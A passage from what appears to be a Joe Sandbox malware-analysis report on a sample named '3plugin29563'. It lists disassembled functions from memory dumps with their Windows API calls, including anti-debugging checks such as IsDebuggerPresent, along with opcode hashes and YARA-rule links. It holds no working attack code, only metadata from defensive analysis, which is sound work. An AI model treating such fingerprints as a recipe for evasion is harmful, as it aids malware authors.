Part of subcall function 02139136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 02139157

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0213EEEE
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0213EF06
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0213EF13

Part of subcall function 0213E9B6: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0213E9DE
Part of subcall function 0213E9B6: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0213EA76
Part of subcall function 0213E9B6: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0213EA80
Part of subcall function 0213E9B6: Concurrency::location::_Assign.LIBCMT ref: 0213EAB4
Part of subcall function 0213E9B6: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0213EABC

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction ID: 8d55b45d68a6493266868a0aee0142c72c74853c894585f503e21e782e14f7ac
Opcode Fuzzy Hash: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction Fuzzy Hash: A0518D35A40215EFCF19EF50C885BAEB777AF44314F1540A8E906BB391CB71AE06CBA0

Function 00436A4E Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00436B46
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00436B50
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00436B5D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2882f89993041c18cc7e579f70f7601bdce28a465fe050bbcc0eb2379e3cef09
Instruction ID: 2b9d84246e72fe2d45de7eb86b63bf61128ca4408ee095d926aa43bc6c097d59
Opcode Fuzzy Hash: 2882f89993041c18cc7e579f70f7601bdce28a465fe050bbcc0eb2379e3cef09
Instruction Fuzzy Hash: 2531D474901329ABCB61DF69D9887CDBBB4BF48314F5081EAE40CA7261E7749B818F49

Function 02146CB5 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 02146DAD
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 02146DB7
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 02146DC4

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2882f89993041c18cc7e579f70f7601bdce28a465fe050bbcc0eb2379e3cef09
Instruction ID: c16f9afb865abe2d639e1fad07bb4a982847192d412a9297040eea40195aebfa
Opcode Fuzzy Hash: 2882f89993041c18cc7e579f70f7601bdce28a465fe050bbcc0eb2379e3cef09
Instruction Fuzzy Hash: DC31A374941328ABCB21DF65DD88BDDBBB8BF08314F5041EAE41CA7260EB709B858F45

Function 02146732 Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,02146731,?,?,?,?,?,02147785), ref: 02146754
TerminateProcess.KERNEL32(00000000,?,02146731,?,?,?,?,?,02147785), ref: 0214675B
ExitProcess.KERNEL32 ref: 0214676D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
Instruction ID: 00b6c9d2b96c00dd0a1d55ddbe664fb6ec695d76b232f70f6e01a2bcfea5a9fd
Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
Instruction Fuzzy Hash: EDE09235080748AFCB126F68DA5CA483B6DEB41797B184424F80986132CF36ED91CA45

Function 0211092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 021109DC, 021109DF, 021109E4
., xrefs: 0211095F
l, xrefs: 02110966

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d486d75307bc883e2e3f020181736d47453b96a2fc3586c5d122d2491ae3b294
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: DD316CB6900609DFDB10CF99C880AAEBBF5FF48324F15405AD845AB314D771EA85CFA4

Function 00442C40 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 669fba1f4e8f83833f98bc73c729d7602012b0e7d561763e83e70887fc5edf9d
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 73F16E71E002199FEF14CFA8C9806AEF7B1FF88314F65826AE915A7345D775AE01CB84

Function 02152EA7 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b5307bef44c41b13618be22e02f8b6748635c597c93742125e2bd4610d34a2
Instruction ID: 8430e5f5ce001a8a5b8a799787202d44e499953b2a8cbaba2318dc8617ec6026
Opcode Fuzzy Hash: 14b5307bef44c41b13618be22e02f8b6748635c597c93742125e2bd4610d34a2
Instruction Fuzzy Hash: 16F13071E41629DFDF14CFA9C8906ADF7B1FF88354F1582A9D825A7344D731AA01CB90

Function 00446F79 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00446F74,?,?,00000008,?,?,00445DFB,00000000), ref: 004471A6

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0c3c95db5ebdcd4b2786a00904424ff1945f28803fe439baec0dfe7817d1bb47
Instruction ID: 7e0ce4159502ac84a9b06f333132c81a39252a0ddf67242f4b2f9a7427509ec3
Opcode Fuzzy Hash: 0c3c95db5ebdcd4b2786a00904424ff1945f28803fe439baec0dfe7817d1bb47
Instruction Fuzzy Hash: 60B15C31214608CFE719CF28C486B657BA0FF45364F258699E8D9CF3A1C339E982CB44

Function 021571E0 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,021571DB,?,?,00000008,?,?,02156062,00000000), ref: 0215740D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0c3c95db5ebdcd4b2786a00904424ff1945f28803fe439baec0dfe7817d1bb47
Instruction ID: 1cd836ed7605862ec804507aa9ddee5d183740e36eac12bc2d4dac281fe19e4a
Opcode Fuzzy Hash: 0c3c95db5ebdcd4b2786a00904424ff1945f28803fe439baec0dfe7817d1bb47
Instruction Fuzzy Hash: 55B12B31650619DFD718CF28C48AB65BBA1FF45364F258698ECA9CF2E1C335E992CB40

Function 0041DD31 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041DD47

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 4d52251f374c7d11211e6f5240a19d1e446031b9504d0aadd99a03d637862d31
Instruction ID: 41cf9fc3ee416cd72e3f6c572b807ded3d6a4708d77f8e722e40afe13fed4d27
Opcode Fuzzy Hash: 4d52251f374c7d11211e6f5240a19d1e446031b9504d0aadd99a03d637862d31
Instruction Fuzzy Hash: 33516BB1E00A058FDB19CF98D9917AABBF1FB58310F24852BC405EB750E3B89980CF59

Function 0043DB3D Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0875efd6ab5abdc92fb7d4eb1858dc44c16744717647e39bf9d60368586bdb29
Instruction ID: 7019c8da1f5ba309f5795231024fa1c24792859efd5e433e7492bf69a5e6a967
Opcode Fuzzy Hash: 0875efd6ab5abdc92fb7d4eb1858dc44c16744717647e39bf9d60368586bdb29
Instruction Fuzzy Hash: 2741C4B5C0421DAEDB20DF69DC89AAABBB9EF49304F1452DEE41D93201D6389E84CF14

Function 0214DDA4 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0875efd6ab5abdc92fb7d4eb1858dc44c16744717647e39bf9d60368586bdb29
Instruction ID: 1134e380ea62decceded9eba09aa44e91b7dca274f67ec6f8f9362c4c5548031
Opcode Fuzzy Hash: 0875efd6ab5abdc92fb7d4eb1858dc44c16744717647e39bf9d60368586bdb29
Instruction Fuzzy Hash: DB41C2B1844219AFDF20DF69DC88AEABBB9EF45304F1442D9E45DE3250DB359E858F10

Function 0041CB37 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0041CB4A

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 27e2aa7250c4dd2fc63f258ab67dc9e06b446d17aec3adfa31153d3d75196d6c
Instruction ID: af2b5603ecad4c3108f463513025ac4f20bed4f6f8f7b462385246338c04ec2e
Opcode Fuzzy Hash: 27e2aa7250c4dd2fc63f258ab67dc9e06b446d17aec3adfa31153d3d75196d6c
Instruction Fuzzy Hash: 38B09236A0B930478A912B18FC4859EB754AA40F1270A01A6E906A72348A546C828BDD

Function 0041DCAA Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001DCB6,0041D6F7), ref: 0041DCAF

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e47fa00434677829360f6076343d9b8da4f7389fa719c6c61f36793cca3e1cfd
Instruction ID: a6fdbf447af6d8ad99291f0874879edbed4233d47512be8139bf3229634aa606
Opcode Fuzzy Hash: e47fa00434677829360f6076343d9b8da4f7389fa719c6c61f36793cca3e1cfd
Instruction Fuzzy Hash:

Function 00437DF3 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00437F6F

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 4543cff92f8ac80dea0da45b8f20f392900de1b6d7972f4c61ad7459d61e67fa
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 77515BF020C74956DB388A2884977BFA79AAB0D304F24309FE5C2D7382DA1DDD45925E

Function 0214805A Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 021481D6

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: b17f8d80d2cc4304cb1e19239fa7a1b349fb0492b2c6d09961197bddf1fa794b
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: C4518E706D06455EDF3C4A2C8D95BBEA79BAB42B08F0B061FD88FD7281DF11E945C612

Function 00423D91 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

Strings

4, xrefs: 00423F2B

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction ID: b82e237127dcfb0fa10c04c4867d3222c4152526d163f27ed4ff836553e78c4b
Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction Fuzzy Hash: F9613A70E00625DFCB18CF49E580AAEB7B1BF48315F65816ED805A7305C738EE86CB98

Function 02133FF8 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

Strings

4, xrefs: 02134192

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction ID: cbf44f10cc66d25b067248660eaa8adf569b792bd5360268fa9030f9910d7faa
Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction Fuzzy Hash: 566138B1E40615DFCB19CF99C580AAEBBB2BF58314F2581A9C815A7705C734F982CF90

Function 004477EB Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

rdD, xrefs: 0044785C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: rdD
API String ID: 0-3625209350
Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
Instruction ID: ab6270cf69ac7270533ca33a82a7ab243688e832fbe28078cfadf2cb6f6c75f8
Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
Instruction Fuzzy Hash: 8B21B673F204394B770CC47E8C5727DB6E1C68C541745463AF8A6EA2C1D968D917E2E4

Function 00783DE3 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

u=x, xrefs: 00783DE9

Memory Dump Source

Source File: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: u=x
API String ID: 0-2572010009
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 5aa454e816d8b273ca1e8ac13176c4a31636dc71d0e0dd0a1bc1aa40eaa7a82e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 7D116572380100AFD754DF59DCC5FA673EAEB89760B298095ED04CB316E679ED41C760

Function 00404CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648

Function 02114F57 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
Instruction ID: c1641910f5f068dbc83447083763bac080b9dc3ce95cc9405730afd006aa50db
Opcode Fuzzy Hash: c25b9b52514627e88030b8299a058399caff8027eae5c57ee015b28b58864221
Instruction Fuzzy Hash: BE225FB3F515145BDB0CCA5DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158648

Function 00404AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf25b0dbb6640e7531eae70db1912767a8345658898021ad054759d257a1fff9
Instruction ID: 5551b9f51d77d12e0cdfb70d5b2e58fa96baad7623356e69be26103cf39da245
Opcode Fuzzy Hash: cf25b0dbb6640e7531eae70db1912767a8345658898021ad054759d257a1fff9
Instruction Fuzzy Hash: F151D2716083918FD319CF2D851523ABFF1BFCA200F084AAEE1D697282DB74D604CB92

Function 02114D57 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d13033d96cc36648b946af6dbf4cc7072ee39e8fda00dcbdb586e002f23b7d
Instruction ID: f7b7f0925c3a0e85e4a3922d7d8f129df742794ccd9effa159c2ddedbf688bd3
Opcode Fuzzy Hash: 12d13033d96cc36648b946af6dbf4cc7072ee39e8fda00dcbdb586e002f23b7d
Instruction Fuzzy Hash: C351C4712087918FD319CF2D841523ABFE1BFDA201F084A9EE4D697252DB74D518CB92

Function 02157A52 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
Instruction ID: 1ec236800a7023b44e74b24bef09c341794d449d573eda1c89b7b4653375f6ac
Opcode Fuzzy Hash: 7c88e02db4234a765754f15175097bcebd66576faf20eec00640c4c3910d1e39
Instruction Fuzzy Hash: AE21B673F208394B770CC47ECC5327DB6E1C68C501745423AE8A6EA2C1D968D917E2E4

Function 004476CB Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
Instruction ID: 79b216ac23c43a8c6cab86974c1fc8e6c24f64a074ddad729131f7aec2c4feb6
Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
Instruction Fuzzy Hash: 3A11CA33F30C255B775C816D8C1327A91D2DBD824074F533AD826E72C4E994DE13D290

Function 02157932 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
Instruction ID: 986a8225fd46a33b4afd766d75313e24f9dce74637608c9ef65ad4478b9d9f95
Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
Instruction Fuzzy Hash: 3F11A323F30C255B775C81A98C132BAA2D2EBD815070F537AD826E72C4E9A4DE13D290

Function 00448790 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 63ee90c2187f191c9dc9089dfcdaf0087429f29da0648bd04df820dd768a0cc5
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C011087B20004143F608862DCCF45BFE795EAC5320B7C827FD1414BB54DE2A9945D608

Function 021589F7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: cd3eb4ac2b7fd0a9faec23da17ecf8f6fa0e90058a0f5589905ce52d261e7d1e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 991157B72C1072C3DA54CA3DD4B42B6A385EBC512872F56FAF8B14B758E322E1C4DA10

Function 007B7E87 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42ef4a3f4de6f3444f893c48202b56674f74a145acb52e31f3cf48782c7d0e0
Instruction ID: 4a86ea543f1467148f93f160e47ca2f0833f99d2173f1fa1cc5598c57c752a6b
Opcode Fuzzy Hash: d42ef4a3f4de6f3444f893c48202b56674f74a145acb52e31f3cf48782c7d0e0
Instruction Fuzzy Hash: 34114C714543A1BF9FE0FE7089948D3B7E2AB4F741BA3B1D9C9195B016DA212193FB80

Function 02110D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 7475680157ac40bf35106480223050aa579ca0c61c8a9dcb87d03faee0e78f5d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
